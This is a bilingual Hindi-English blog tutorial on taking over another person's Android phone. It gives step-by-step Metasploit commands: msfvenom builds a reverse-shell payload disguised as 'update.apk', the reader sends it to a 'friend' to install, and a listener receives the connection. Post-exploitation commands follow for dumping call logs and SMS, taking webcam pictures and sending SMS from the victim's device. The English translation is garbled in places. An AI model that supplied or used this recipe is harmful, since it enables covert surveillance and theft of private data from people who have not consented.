How to hack a mobile phone? || एक मोबाइल फोन को कैसे हैक करें?

एक मोबाइल से दूसरे मोबाइल को कैसे हैक करते हैं ये आज के टुटोरिअल में बताया जाएगा।

How to hack from one mobile to another will be told in today's tutorial

 

 

 

 

1.सबसे पहले आपको TERMUX  ऐप डाउनलोड करना होगा प्ले स्टोर से

1. First of all you have to download the  TERMUX app  from play store

 Link Termux app:-https://play.google.com/store/apps/details?id=com.termux


2.अब आपको Metasploit install  करना होगा

2.Now you have to install  metasploitable.

3.मैंने Metasploit इंस्टॉल करना पहले बता दिया है।

3. I have already told you to install Matter Close

        तुम यहां से चेक कर सकते हो कि मैं Metasploit कैसे इनस्टॉल करें? From here you can check how do I install type Metasploit?

                                 👇👇👇👇 

link:- https://rjkumarhackerszone1.blogspot.com/2020/05/metasploit-framework-introduction-and.html 

4.  NOW मैं जैसे बताऊं वैसे स्टेप बाय स्टेप कमांड देने है आपको।

4. Now I have to give you step by step command as I tell you.

 

5. सबसे पहले आप का IP Address चेक करो Termux में।

5. First check your IP address in Tarmax.

 command :-  $ ifconfig

 
6. अब आपको Metasploit folder में जाना।

6.Now you have to go to Metasploitable folder 

command :- $ cd metasploit-framework/

7. अब आपको एक ऐप बनाना होगा जो ऐप आपके मित्र को भेजोगे?

7. Now you have to create an app that will send the app to your friend?

command :- $ ./msfvenom -p android/meterpreter/reverse_tcp lhost={your ip address }  lport=4444  R> sdcard/update.apk

 
8.आपका ऐप आपको फाइल मैनेजर में मिल जाएगा आपको?

8.Will you find your app in the file manager?

 
9. यह अब आपके फ्रेंड को भेज दो।

9.Send it to your friend now.

then 👇👇👇👇👇👇

10.आप वापस Termux में जाओ और स्टेप बाय स्टेप कमांड do

10. You go back to Tarmax and step by step commands!

 commands:-

                  1.1  $ ./msfconsole

                  1.2  $ use exploit/multi/handler

                  1.3 $ set payload android/meterpreter/reverse_tcp

                  1.4 $ set lhost < your ip address >

                  1.5 $  set lport 4444

                  1.6 $  exploit

 

 

 11.तुम्हारे फ्रेंड से ऐप को इंस्टॉल करवा लो।

11. Have your friend install the app.

 then you find that link this 

then you will hacked your friend moblie

 
👉You can check whether the device is rooted or not by using the following command :

                    1  check_root

👉he above command will generate a TXT file with all the detailed list of call logs. Use the following command to read its contents

                     2  dump_calllog

 👉
The above command will generate a TXT file with all the detailed list of call logs. Use the following command to read its contents 

                3  cat <text file name>

👉You can also send any kind of SMS from the device, remotely, with the following command 

    4  send_sms -d 95******** -t hacked

👉You can even use the following command to capture a picture

 5.  webcam_snap

👉Similar to dumping the call logs, you can also dump all the SMSs will the following command :

 6. dump_sms

 



This way, you can exploit android as the way you like it.

by :- rj :-attack on u

 

 

Comments